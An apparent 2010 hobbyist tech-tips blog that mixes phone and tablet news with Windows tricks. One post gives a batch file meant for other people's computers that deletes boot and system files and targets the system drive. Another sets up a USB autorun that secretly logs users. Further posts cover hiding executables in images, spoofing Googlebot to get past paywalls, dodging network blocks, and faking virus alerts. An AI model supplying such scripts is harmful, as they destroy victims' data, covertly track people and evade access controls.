Friday, December 31, 2010

Use Opera Portable to access blocked websites from anywhere

The Opera browser is a browser with very unique features. When you turn on the Turbo mode, like on mobile devices, the browser sends the request to Opera's high performance servers, which then act as a middle person to transfer the website to you. In the process, the servers compress the data, so that it downloads very fast on your computer. Though it causes the images on the page to be of lower quality, it does the work super-fast if you happen to be using a very slow Internet connection.

You can also use this feature to your advantage when going to school or work.

On school and many workplace networks, many websites (that may make you unproductive) like Facebook, YouTube etc. are blocked by the administrators. When your browser sends a request to connect to any of the blocked website servers, the network blocks you.


Opera Turbo on
But if you use Opera Portable on a flash drive (so that you can carry it around), run it on a computer at your workplace and then turn on Opera Turbo, your browser will send the request to the Opera servers, which will act as anonymous proxies for you. The network will not be blocking the Opera servers from communicating with you, and you will be able to browse the websites safely.

Network admins usually block out major anonymous web proxies, which are usually free services that download sites for you. But it will hardly ever be a case that an institution is blocking Opera servers. Plus, unlike other web proxies, Opera will let you download compressed websites, giving you much better performance too.

Download Opera Portable Edition now.

Thursday, December 30, 2010

Reasons why Windows Phone 7 can beat Android

Windows Phone 7 or Win 7 is the latest operating system  introduced by Microsoft in the market, though no phone operating on it has been launched in India but the wait is worth it.
Though Windows have already made a big fault by releasing it so late because Android has taken a strong grip in Mobile phone market, it would be quite a challenge for Microsoft to get its loyal smartphone users back.
Sure Android is a good OS but there certain features in the new Windows Phone 7 that might compel potential smartphone buyers to get a move on from android and try something else.
Here are five reason why Windows phone 7 can compete with Android OS…
Windows Phone 7 


1. Tiles Layout
Interesting but very practically designed, the new Windows Phone 7 OS has no icons in its layout like Android but offers Tiles. So how are they different? Well they could save you a lot of time and generate updates without opening the application.
All your favorite social network updates, news updates, score updates and much would be displayed directly on the homescreen with this feature, therefore it will save you a lot of time and make things more organized.

2. Hubs Features

hubs on windows phone 7Do you like carrying your community and friends with you? and share a lot of things besides just small sized documents with them then please don’t use free file hosts anymore because Windows Phone 7 offers Hubs features which lets you carry your community with you and allows sharing of multiple files or various formats with them.
So you can create several hubs like Office hub, friends hub etc. and share without limits.
apps on windows phone 7

3. Lots of Apps, Dedicated Apps Store

Though this is not something you might have not really heard in these months since the most popular apps store is of Apple followed by Android but hang on! Microsoft has decided to offer its app store not in primitive stage but in a completely develop stage which means there are not just a few but several hundred apps which might take you upto 6 months to use and test.
A lot of free games are also included that supporting Xbox Live Integration.

4. Hell lot of Xbox Games

Did you get pretty excited after reading Games word in the last sentence and its Xbox Live Integration the don’t get surprise, i could not believe it when i heard it first either but this seems to be true.
Windows Phone 7 OS has the capability and hardware to run Xbox games and also offers multiplayer support. Though the quality of games is still under doubt, but if the doubt comes out to be negative then no phone OS would stand a chance against Win Phone 7.
marketplace on windows phone 7

5. Great App world for developers

Microsoft is hiring! yes, they are planning to hire quality developers for their application, this would offer great earning and learning opportunity to thousands of application developers.
They have also provided privileges to users to add their applications and once its tested upon quality and approved, the developers can list the app on their apps marketplace and assign it desired price.

Tuesday, December 21, 2010

Download Google Talk Lab Edition with Group Chat

Google Talk Lab edition have released there new desktop version of Google Talk with same great features like that of the Google Talk Gadget including instant messaging, emoticons, and group chat.
image 
With this lab edition desktop notifications from Google Calendar,Orkut and Gmail are made available.But the Mac and Linux users will have have to wait for this release as it only supports windows PC for now.

The integration of Google calendar makes you to keep reminded of your upcoming appointments without opening your Google Calendar.
But if are a regular Google Talk user then please wait before installing this labs edition since it misses some important features like voice calling and file transfer.

Friday, December 17, 2010

iPad alternatives

The Apple iPad is widely accepted as the first successful tablet computer. It has sold 7.5 million as of 30 September 2010 according to Wikipedia. This figure is well above any of it's competitors. The iPad built upon the success of the iPhone and uses the same iOS operating system. It is only recently that there has been any real threat to the iPad's dominance and the release of the iPad 2 may seal the iPad's dominance in the tablet computer market.


But are there any real alternatives?

1. Samsung Galaxy Tab
This 7 inch Android powered tablet is currently the iPad's strongest competitor. It has many of the same features as the iPad and is around the same price. It's a well designed, professionally built tablet featuring, Wifi, 3G connectivity and a very responsive touchscreen. However it is powered by Android, an operating system created for much smaller devices. It also has very few apps that run on it as many Android developers have not embraced it. Although it is better than the iPad in some ways (it's smaller and lighter and has a micro SD card slot) it hasn't seen anything like the success of the iPad.






2. RIM BlackBerry PlayBook
Research in Motion (RIM) are a company which has seen little success in the touchscreen phone market. They seem very attached to the physical qwerty keyboard when all other manufacturers are moving to newer technology. Despite this fact they have decided to produce a touchscreen tablet known as the BlackBerry PlayBook. The PlayBook have joined Samsung in creating a 7 inch tablet which is also significantly smaller and lighter than the iPad. The PlayBook has front and rear facing cameras, a big advantage over Apple; on the other hand it will not feature 3G connectivity. The PlayBook is due to be shipped in early 2011.



3. Motorola Honeycomb Tablet
This tablet, which will be powered by the forthcoming , Android Honeycomb has just been announced. The name of this this tablet has not been announced by there are 3 possibilites: Stingray, Everest or Trygon. The hardware on this tablet will include a decent 32GB of flash memory and  1GHz Tegra 2 T20 processor. This is a real iPad competitor as it will be the first tablet to use a version of Android created specifically for tablet computer.s
 HP Slate.

There are other tablets on the market but they simply aren't up to the standard of these tablets. While the Galaxy Tab is a great product, it is ahead of Google and the operating system it's using just isnt suited to the larger screen size. The release of the PlayBook and the Android Honeycomb next year will cause some major shifts in the Tablet computing market.

Friday, November 26, 2010

Scare your friends with virus alerts

Step 1. Open up notepad

Step 2. Type  lol=msgbox("Whatever you want message to say",20,"Whatever you want the window to be titled") 
Eg: lol=msgbox("Warning your computer has been infected by a virus ",20,"Virus Alert")  

Step 3. Save the text as Whateveryouwant.vbs  The number 20 represents the type of window style the message will be in. You can experiment with different styles you want.

Use Rupee Symbol In Writing

It has been a movement of pride for Indians to have a unique identity to represent their monetary unit. There has been lot of conversation on how to get the symbol involved in the writings? Well nothing to worry, here is the solution..
Download Rupee font from attachment
  • Go to C->Windows->fonts or Control Panel->fonts. Copy paste the downloaded file.
  • Open notepad or MS Word .
  • Go to Format->font select rupee font or simply font in MS Word.
  • To get the rupee symbol, just press 0096(of your num pad) while holding down “alt” key on your keyboard.
That’s it, the symbol is now on your screen!

Download Here

Saturday, November 20, 2010

Firefox Easter Eggs:Secret Firefox Tricks

Friends! m sure u might have heard about Easter Eggs of halloween..
What is an Easter Egg?
- An Easter Egg is a hidden feature or novelty that the programmers have put in their software.
Mozilla Firefox,the world's second most widely used browser also has some Easter Eggs hidden.
1]- Go to the address bar in Firefox

2]- Copy and paste this- about:robots [Gort!Klaatu barada nikto!]

3]- Or Copy and paste this- about:mozilla [This is Mozillas reply to IE6 Joke]

4]- Or Copy and paste this- chrome://browser/content/browser.xul [Mozilla under Mozilla!]

5]- Or copy and paste this- about:credits

Sunday, November 7, 2010

Shutdown a Computer For Ever (NOT YOURS)

Open up notepad and copy and paste the codes given below. Save it as a .bat file.To do this click on Save As.Select all file types and give the name as something.bat.


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:
tldr
del c:
tldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

This should shut down the computer on which the file will be executed. It shuts it off once and deletes the files needed to reboot and restart. Have fun …njoy!!

REMEMBER – DO NOT CLICK THIS FILE. YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Friday, November 5, 2010

Add a folder to 'Send to' Menu

Hey friends,u might have noticed the need to copy and paste some files constantly to a single folder. It would be very helpful if the folder existed in 'Send to' menu.Doing this is very simple.Here are the following steps we need to follow.
Step 1:Go to Folder Options in Tools.
Step 2: Show Hidden Folders.
Step 3:Go to C:\Documents and Settings\user name
Step 4:Now go to Send To folder and paste the shortcut of the Folder u want in the 'Send to' menu.

Happy 'Sending to' your desired Folders...

Wishing you all a "HAPPY DIWALI"

Monday, November 1, 2010

Lock your Folder without any Software

This is a different way to lock up ur folder without using any software
This is not hiding ur folder but locking it..using batch file...

What is batch file???
It is this file (command.com) which handles all DOS commands that you
give at the DOS prompt---such as COPY, DIR, DEL etc.

code...

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==pass goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

Steps to do it........
1) Copy the give code in a note pad and save the note pad in your pc with the name lock.bat (that is with the extension of .bat). You can replace the lock portion with anything u want. (Default password is pass.Search for pass in the code and change it to whatever you want.)

2) A batch file will be created where you have saved. Now double click on it , it will make a folder with the name Locker at the same place where the batch file is save.If you want another name replca Locker in the code with the name you want.

3) Now add the files you want to be locked in that folder.

4) Double click on the batch file. It will ask for locking the folder formed. Type y(yes). The folder will be locked and hidden.

5) To unlock,double click on batch file again and enter the password in the new window opened.
Download the batch file.

Invisible Folder

Go to ur desktop
Right click->Create a new folder->Rename it as:

ALT + 0160 (i.e. pressing the ALT key type 0160 from ur numpad...mindwell making things clear only numpad... nothing else)

The above character wud seem a space.Now press enter & then right click-> Properties->customize->change icon->next look for a blank icon and select it.

How to hide a file in a image

1. Gather the file you wish to bind, and the image file, and place them in a folder. For the sake of this demonstration, I will be using
C:New Folder

-The image will hereby be referred to in all examples as image.jpg
-The file will hereby be referred to in all examples as New Text Document.txt

2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar)

3. Open command prompt by going to Start > Run > cmd

4. In Command Prompt, navigate to the folder where your two files are by typing
cd location [ex: cd C:New Folder]

5. Type copy /b image.jpg + secret.rar image.jpg

Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.

In order to view/extract your file, there are two options that you can take

a) Change the file extension from image.jpg to image.rar, then open and your file is there.
b) Leave the file extension as is, right click, open with WinRar and your file is there.

In this way you can bind .exe files with any file.. happy hacking with binding exe files..

Tuesday, October 19, 2010

Operate mouse pointer without mouse

Want To have fun With Mouse Cursor. Just Follow the Steps Below.

Iam giving you a trick

Press Left Alt + Left Shift + Num Lock Button + Ok

with the help of Numeric Keypad e.g ( Press and Hold the following Keys )

7          8          9

4                      6

1          2          3   



For Normal Click Press 5

Default
Left Alt + Left Shift + Num Lock

Change Folder Background

It involves making a new desktop.ini system file for that folder, and changing the attributes for that folder.
First, select the picture you want for that folder. It should be sized 815 x 685, or you will get tiles (of course, if you want tiles, use a smaller pic).

You can use your photo editor to crop and/or resize the pic appropriately.
Note the address of the pic. You will need that.Create a folder (in Documents) to store the desktop.ini file you will make, because it will replace the current system.ini of the folder it's in.

Now, open your notepad. Paste the following code into it.

[{BE0981 40-A513-11D0-A3 A4-00C04FD706EC}]
IconArea_Image ="C:\your picture location.jpg"
IconArea_Text= 0x00000000

Make the following changes:

The first line has spaces in it. Remove those spaces.
In the second line, put the address of the pic you will use, in the quotes.
The third line is the color of the folder text. Use light colored text for dark pics, and dark colored text for light pics.
Some color codes you can use. Feel free to use others, if you know them.
Black - 0x00000000
Pink - 0x00FF99FF
Purple - 0x00FF99FF
Red - 0x00FF0000
White - 0x00FFFFFF

· Save the file as: desktop.ini
· Save as file type : All Files
· Save it in the storage folder you made.

Copy the desktop.ini file you just created, into the folder you want to change.
It should replace the one in there.

Go to START and RUN

Type: attrib +s "C:\Location of your folder"
The location of the folder you want to change is in the quotes.
Click OK (or Return)
Open your folder and the picture should be there!
If the desktop.ini files shows in the folder, you can right-click it,select Properties, and make it hidden.
Please note, this only changes the folder you put the desktop.ini file in, not all of them.

Display A Notice at the Startup of your Computer

If your PC has multiple users then you can now display legal notice to every user before they login to your PC. This legal notice will be displayed at every startup just before the Desktop is loaded. Using this you can tell your friends about the do’s and dont’s in your computer when they login in your absence. Well you can do this pretty easily. For this there is one small registry hack. Here is the step-by-step instruction to do this.
1. Go to Start->Run, type regedit and hit ENTER


2. Navigate to the following key in the registry



HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\policies\system


On the right side pane look for “legalnoticecaption“, double click on it and enter the desired Legal Notice Caption.

3. Next below this look for “legalnoticetext” and enter the desired Legal Notice Text. The legal notice text can be up to a page in it’s size so that it can include a set of do’s and dont’s for your computer.

4. After you do this just restart your computer and upon the next startup you can see the legal notice information for your computer. This trick works on both XP and Vista. You can also try it on Windows 7 and should work with no problems.

Monday, October 18, 2010

Make all websites think you are from Google

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first....

The lesson you should have learned here is: Obviously Google can go where you can't.

Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE.


In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.

Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.

How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.


Code:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http: // www .googlebot .com/ bot.html



Voila! You're done!

You may always change it back again.... I know only one site that uses you User Agent to establish your eligibility to use its services, and that's the Windows Update site...

To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:


Code:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Information Gathering through USB drives

There are few ways to Hack Passwords using a USB Drive or Pen Drive.
Here is one of them..


Create an autorun.inf file on the root of your flash drive/Pendrive with the following contents:

[autorun]
open=username.bat
action=Open folder to view files

Now, create a batch file called username.bat with the following contents:

@echo off
echo %username%>>users.dat
date /t>>users.dat
time /t>>users.dat
start "Explorer" %SystemRoot%\explorer.exe

Create username.bat and autorun.inf in the root of your pendrive

Save both file and you are good to go. Now whenever a user plugs your pendrive into their PC,it will display an autoplay option indicating that they have to click on the icon to open the drive to view its contents. A small DOS window will flash for a moment and then disappear.Now If you go into the root of the drive, you will find a new file called users.dat which will record the user names of all the users who have accessed your drive by clicking on the icon. You can open the DAT file using notepad and view its contents.

However..This is not a fool proof method as some geeks disable the autoplay option (or disable writing to USB drives) ,or they just bypass it by pressing RIGHT SHIFT key when the pendrive is connected and hence their name will not be recorded or they can delete the users.dat file. But that said,it will work fine nevertheless......

Alternatively, you can also use a Software USB HACK, but that will give you some problems as your Anti-Virus will keep deleting it.

And turning off anti-virus, specially when you are doing this kind of work, is highly not recommended.

Customized Backgrounds for your pen drive

Here is something, which will turn your boring background of your Pen Drive into a cool one, by putting yours or any other photo.

Just Follow these Steps

Step :1

Copy this code into notepad (copy and paste), then save it as "desktop.ini"

[.ShellClassInfo]
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=127
ConfirmFileOp=0

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image="your_picture.jpg"
IconArea_Text="0xFFFFFF"
VeBRA sources - don't delete the tag above, it's there for XXXXX purposes -
[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}

[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=Folder.htt
PersistMonikerPreview=%WebDir%\folder.bmp


2. Put "desktop.ini" file onto your flash drive and replace "your_picture" with the
name of the picture you want to use leaving the .jpg extention the same.

3. Now copy the same picture that you want to use onto your flash drive.

4. Close the window and open your pen drive again...and Enjoy your new background

Here is a Screen Shot of my Pen Drive

Tuesday, August 24, 2010

Increase Your PC's Experience Ratings in Windows Vista

1. Open up Windows Explorer & Browse to C:\Windows\Performance\WinSAT\DataStore.

2.Right Click on the most recently created XML file there & click on properties.

3.Click on the Security Tab & then on the Edit Button.

4.Click on Add & enter the user name that you log in using . click OK.

5.Select the entered ID & check the checkbox Full Control & click OK.

6. Click on YES for any confirmation Windows that may popup.Finally , click OK.

7. Open Wordpad from Start>All Program> Accessories> Wordpad.

8.Click on File>Open & Browse to C:\Windows\Performance\WinSAT\DataStore. Select All files as the type of files Using the drop down menu & select the XML file & Click OK.

9. Under the  section, Make changes to the scores given. These are the changes we made to strike the totally extraordinary scores.


10. Save the file & Restart the performance information & tools in the control panel.

Monday, August 9, 2010

Gmail Dot trick

What is the Gmail DOT Trick ?
See the following example

Suppose There is a Gmail account : Example@gmail.com
with password : abcd

You will get logged in to example@gmail.com If you use
email as : E.xample@gmail.com
password : abcd
email as : Ex.ample@gmail.com
password : abcd
email as : Exa.mple@gmail.com
password : abcd
email as : Exam.ple@gmail.com
password : abcd
email as : Examp.le@gmail.com
password : abcd
and so on..

That means gmail does not count periods (.)

So you can use this trick for using the same email for various GPT, PTC, Twitter accounts as they interpret all the above emails as different but gmail considers it the same.


Have fun making many accounts from your single Gmail account...

Tuesday, August 3, 2010

Change Computer's Processor Name

Hi Friends! An interesting trick !
You can change the processor name of your computer for anything you want to. This can be done just for fun or to boast yourself among your friends. Just follow these steps:
  1. Click ‘Start’
  2. Click ‘Run’ and then type ‘regedit’
  3. In the left panel of the registry editor, go to ‘HKEY_LOCAL_MACHINE > HARDWARE > DESCRIPTION > SYSTEM > CENTRAL PROCESSOR
  4. Now in the right panel, right click on ‘Processor Name’ string and modify with anything you want to.  
Enjoy and do tell me if you have any problems....

Thursday, July 29, 2010

6 of the Best Hackers of all Time

"Hackers"... the moment we hear that word a chill runs down our spine with excitement.We also want to be like them.They are someone special., some with extra knowledge and who are very intelligent. I know and am confident that everyone interested in computers has at some point of time wanted to become a hacker.
But the word 'hacker' is misunderstood by many of us.Hackers are actually intelligent computer professionals. Some people use this knowledge for the good and some people for bad purposes to bring down a system,cracking passwords. And thats how the hackers are divided: White Hat and Black Hat. White Hat are the good ones and Black Hats as you might have guessed are the opposites.
While the real experience of hacking might not be accurately represented in movies, hackers certainly do become famous for white and black hat —good and bad— deeds. The following are six of the most famous hackers of all time:
White Hat

1. Linus Torvalds
Creator of the famous Unix-based operating system, Linux, Torvalds used his hacking skills to change the fundamental programming on his home computer. This initial foray into the inner workings of a Sinclair QL inspired Torvalds to create his own system. Thanks to his efforts, the now extremely popular, open source OS was born.

2. Tim Berners-Lee
This inventor of the World Wide Web was caught hacking into Oxford files while he was a student at the university. He was then banned from the university. Eventually, he ended up working at CERN Laboratories, a European nuclear research organization. While there, he figured out a way to send hypertext through a network. At that point, the Internet as we know it was born.

3. Stephen Wozniak
While he is known known for being one of the co-founders of computer giant Apple Computer, Stephen Wozniak once made blue boxes to bypass telephone switching mechanisms. In this way, the user could get free long distance coverage. He was caught when he started selling the blue boxes to classmates.

After dropping out of college, Wozniak collaborated with his friend, Steve Jobs, to build the first Apple personal computers in their garage. The rest, as they say, is history.

Black Hat


1. Kevin Mitnick
Described by the Department of Justice as “the most wanted computer criminal in United States History,” Mitnick hacked into corporate computers, stole designs and product information, hacked the Los Angeles bus punch card system, and scrambled phones. He was eventually captured when he hacked into the computer of fellow hacker Tsutomu Shimomura. Shimomura then made it his mission to find Mitnick, and soon afterward Mitnick was in custody.

Today, he runs a computer security-consulting firm and has authored several books.

2. Robert Tappan Morris
The Morris Worm was the first such virus to be introduced to the Internet. While studying at Cornell, Morris wrote the code and released it. He claimed that he was only trying to see how large the Internet was. Unfortunately, the worm caused at least 6,000 computers to become unusable.

Three years of probation, 400 hours of community service, and $10,500.00 later, Morris had paid his debt to society. He now works as a tenured MIT professor.

3. Jonathan James
At 16 years of age, James was the youngest hacker to ever be sent to prison. The mot notable of his offenses was a back door he installed in a Defense Threat Reduction Agency server. This backdoor allowed him to access some e-mail correspondence as well as to isolate the usernames and passwords of key government employees. He also hacked into NASA’s computer system and stole technological information worth $1.7 million. To remove the inserted code, NASA had to shut down their computers. This cost them $41,000.00

James was sentenced to six months of house arrest, but was sent to prison for six months when he violated parole.

Sunday, July 25, 2010

Indian Browser called 'Epic' Launched

It gives me immense pleasure while writing this post because I am feeling elated to inform my friends,especially Indians that a browser named 'Epic' has been launched which proves the mettle of Indian software professionals. A Bangalore based startup company Hidden Reflex have developed this wonderful browser.


"Hidden Reflex is a software product startup founded by Alok Bhardwaj in 2007 and based in Bangalore. Alok, who was raised in the U.S., was inspired by the success of open source software and web 2.0 innovations. Hidden Reflex began as a team of three but soon progressed and now has dedicated teams working on two products simultaneously – the Epic Browser and NewsDrink. The company also has three patents pending related to its product innovations."            source

The company claims the browser to be the first-ever web browser for India.This is the only browser to have an inbuilt anti-virus scanner and other features like In-Private Browsing.Accessing My Computer and loads of innovative features makes this browser a power packed bundle and enhances your computer experience. Based on the popular Mozilla open-source platform, internet surfing was a breeze and the browser is very lite and beautiful to look at. I was awestruck at this tiny Indian marvel. Some cool features like peacock theme, Taj theme, Katrina Theme are surely will be an Indian surfer's delight.

One thing worth mentioning is the sidebar which has shortcut icons of frequently used applications. How can an Indian browser forget Indian scripts widget.Its been over a week I started using this and guess what? It is my default browser leaving behind Internet Explorer,Mozilla Firefox,Google Chrome . "The Browser War" has just begun..
Download Epic Browser Here
Screenshots
Home Page

Saturday, July 24, 2010

iDisplay Extends Windows And Mac PC Display Screen On iPhone/iPad

Apple’s iPad is so popular now as a great companion tablet PC or even being used as home centralized control system or merely as an expensive Digital Photo frame. With its relatively large screen size, have you ever wonder how you can use it as an extended secondary display? Now with the help of apps named as iDisplay, users can easily transform the famous iPad into external display via WiFi connection.
For the start, there are two apps that need to be installed on both your laptop and iPad. And since Apple iPhone doesn’t come with standard Ethernet port, users will have to establish the link between both through WiFi, so that the desktop screen can be shared just like having additional secondary screen in extended mode.
Once installed and launched the program at both ends (with WiFi connection turned ON), a message with available lists of computers will be prompted. Tap on the respective PC name will connect both with extended display ready to be used. Since iPad is capacitive touch based and so there is a bit tricky to use it as your mouse cursor on the secondary display (iPad screen) will not be displayed correctly. Some simple tips here: Just tap on your iPad screen with two fingers will show keyboard and application menu. Besides, users can drag with two fingers to pan, pinch to zoom, or tap and hold to simulate right click and etc.

Tested on a jailbroken iPad 16GB WiFi version and it works great without significant lagging when sharing the screen. But for first time users, you will have to spend few minutes familiarizing with virtual screen position as well as its control function but once you get used to it, it is no doubt an effective tool as extended view for both your Windows and Mac PCs.Specifically designed to run on iPhone, iPod touch, and iPad, iDisplay (costs $4.99 at iTune) is compatible with Mac OS X and Windows XP(32-bit) (Windows Vista and 7 is on the way) and users can get free installer download at ShapeServices for more effective work.

Thursday, July 22, 2010

Block and redirect websites using HOSTS file

I am sure after reading my previous post you all might be wondering about how to block websites using HOSTS file, or even how to redirect them? It would be so cool to type http://www.google.com and see http://www.yahoo.com open infront of you!!! Excited then read on!

Navigate to C:\Windows\system32\drivers\etc\hosts in your windowsXP,Vista or 7. (if C is the windows directory)

As you might have all known by now that hosts file does not have an extension and so you might be wondering as to how to open it.To open the HOSTS file drag it into a notepad or rightclick>open with>notepad.. It will look like the image I have put in.

BLOCKING WEBSITES
To block a website. Simply put
127.0.0.1     www.example.com     

Replace example with the website you desire. For e.g if you want to block facebook,myspace and orkut you need to type
127.0.0.1    www.facebook.com
127.0.0.1    www.myspace.com

127.0.0.1    www.orkut.com

Now save the file. You are done. Whenever you type these websites in your browser it will display an error "The page cannot be displayed".

REDIRECTING WEBSITES

If you want to redirect google to yahoo,you need to know the IP address of google. For this you need to type ping www.google.com in command prompt. That will give you the IP address which is 209.85.231.104
Now in you hosts file you need to type

209.85.231.104     www.yahoo.com


So whenever you type www.google.com in your browser it will open www.yahoo.com.

This can be used for hacking also. Think how???  :) :)

What is a hosts file?

Hi friends!! I am back with yet another interesting post! Many of you might have heard about the hosts file isn't it? Well actually The short answer is that the Hosts file is like an address book. When you type an address like www.yahoo.com into your browser, the Hosts file is consulted to see if you have the IP address, or "telephone number," for that site. If you do, then your computer will "call it" and the site will open. If not, your computer will ask your ISP's (internet service provider) computer for the phone number before it can "call" that site. Most of the time, you do not have addresses in your "address book," because you have not put any there. Therefore, most of the time your computer asks for the IP address from your ISP to find sites.


If you put ad server names into your Hosts file with your own computer's IP address, your computer will never be able to contact the ad server. It will try to, but it will be simply calling itself and get a "busy signal" of sorts. Your computer will then give up calling the ad server and no ads will be loaded, nor will any tracking take place. Your choices for blocking sites are not just limited to blocking ad servers. You may block sites that serve advertisements, sites that serve objectionable content, or any other site that you choose to block.

You can find your hosts file in:
Windows 95, 98, Me -                  %WinDir%\
NT, 2000, XP, 2003, Vista, 7-      C:\Windows\system32\drivers\etc\
Windows Mobile-                          Registry key under \HKEY_LOCAL_MACHINE\Comm\Tcpip\Hosts


Do read my next post on blocking and redirecting websites

Monday, July 19, 2010

Making Invisible Folders

I hope, almost everybody familiar to the computer might have an idea as to how to hide a folder.Today I am going to tell you how to make a file that is invisible which means it does not have an attribute that is hidden.It actually stays there but becomes invisible. Confused!! Let me tell you how..

Make a new folder and name it as Alt+0160(Numpad). You will see that the folder is created but has no name. Now you can still see the icon. I hope many of you know how to change the icon. Right Click on the folder and go to Properties and Customize tab. There you will find Change Icon.Click on it . Scroll Right and you will find a blank icon.Click there and whoosh!! You have your invisible folder. To find it and access it drag your mouse on the screen.By doing this you will find that a small square in blue colour is selected. Click on the square. You can now access it.

Saturday, July 10, 2010

Make an empty file of any specified size

Hey friends I am back with yet another interesting post.Yes you read the topic right. You might be wondering how can an empty file have a size? Its like we are saying a massless object has a weight of 5kgs!! But this is computer world friends.Everything is possible here.And you always wondered as to why you end up downloading fake torrent files.How do people create Space-Eater Viruses? The solution to all these questions are here..

To make an empty file goto command prompt. Start>Run and type cmd. or Win+R. Once you are in the command prompt, type
fsutil file createnew <filename> <size in bytes>
to create a file name with a specific extension,type
fsutil file createnew <filename.extension> <size in bytes>

for example if u want to create a file called hello.txt of size 5 mb, first convert 5mb to bytes which will be 5*1024*1024 bytes.
So you need to type fsutil file createnew hello.txt 5242880.
 If you forgot to mention the extension you can always do that by typing ren hello hello.txt.

I suppose you have got an idea of Space Eater Virus. Try to make out how to make it on yourselves or wait for my next post and you will get your answers.I will show you how to do it.You also got an idea of fake files and how those dirty uploaders do it but dont do it yourselves while uploading torrents.


Hope you enjoyed the post!!Feel free to comment if you have any problems.
===================================================
Note:Windows Vista and Windows 7 requires administrator privileges to use fsutil command so open cmd using administrator privileges. To do this go to Start>All Programs>Accesories>Command Prompt(right click >run as administrator)
===================================================

Changing Extensions Using command Prompt

MS-DOS although not used now is a very powerful OS. Command prompt can do many things which even windows cant do and learning it has always been fun and I personally have always liked it.
To goto command prompt go to Start>Run and type cmd or press Win+R.
To rename a file in command prompt,type
ren <original file name><new file name>

To change the extension, type
ren <original file name.extension> <old file name.new extension>



Happy command prompting!!

Tuesday, July 6, 2010

Send a SMS using emails(free)

I have a doubt that many of you might not be aware of this method of sending SMSes. Are you aware of the fact that every time you send an sms it has to go through a gateway. So if you are aware of the email gateways you can just send an e-mail to that address and you will be able to send SMSes free of cost.

Steps:
1. Open your mail provider.
2. In the To field type in phonenumber@domain.name
3. Click here to get a list of email to sms gateways.
http://www.tech-faq.com/how-to-send-text-messages-free.html
http://www.mutube.com/projects/open-email-to-sms/gateway-list

Make your own .exe files

Guys! I am sure many of you might have had previous experiences with batch files(.bat) or visual basic scripts(.vbs). Many of you might have wondered as to how could you convert it to exe files. exe files dont only look standard, they have become a standard platform for software distribution. Moreover it protects your scripting to be copied or modified. It is a well known fact that .bat files can be easily read and modified in notepad and so is the case with .vbs. In this post i would explain how to convert your .bat files or .vbs files to .exe and that to without using any third party softwares..

There is a very good tool inside windows called IExpress 2.0. It is actually located in C:\Windows\System32. But you can access it by typing iexpress or iexpress.exe in Start>Run(or Win+R).

1. Click on Next.
2. Next you will be presented with the Package Purpose screen. For our purposes select “Extract Files and run an installation command” and click the Next button.You will be presented with the Package Title screen, which will give you the opportunity to give your project a name.
3.
You will next be presented with the Confirmation Prompt Screen. We would like the batch file to just be extracted and run so just choose “No Prompt” and click the Next Button.If you want some prompt for the user before your .bat comes into action u can do that.
4. You always see long license agreements in software distribution packages.. You can do that here in the screen you are presented with.
5.
The Packaged Files window is where you will select your batch file (or .vbs). Click the Add button and browse to your desired file. Then click next.
6. Here you are presented with a window titled Install Program to Launch. Use the drop down control next to “Install Program and choose the only option that will be present, the .bat or .vbs file that you chose in the previous window. The Show Window screen is next. I didn’t want my users to be prompted in any way so I chose Hidden. Click Next.
7. Select a finish message if u would like.
8.
The Package Name and Options window is where the new .exe specified. Type in a path or browse to the folder you would like your .exe in, type a name in the file name box and click save. Also check the box that says “Hide File Extraction Progress Animation from User.” If you’re worried about long file names go ahead and click the other box as well.
9.
Since we really aren’t installing anything we probably want to tell the Configure Restart window to not restart. So choose the option that says “No restart” and hit Next.
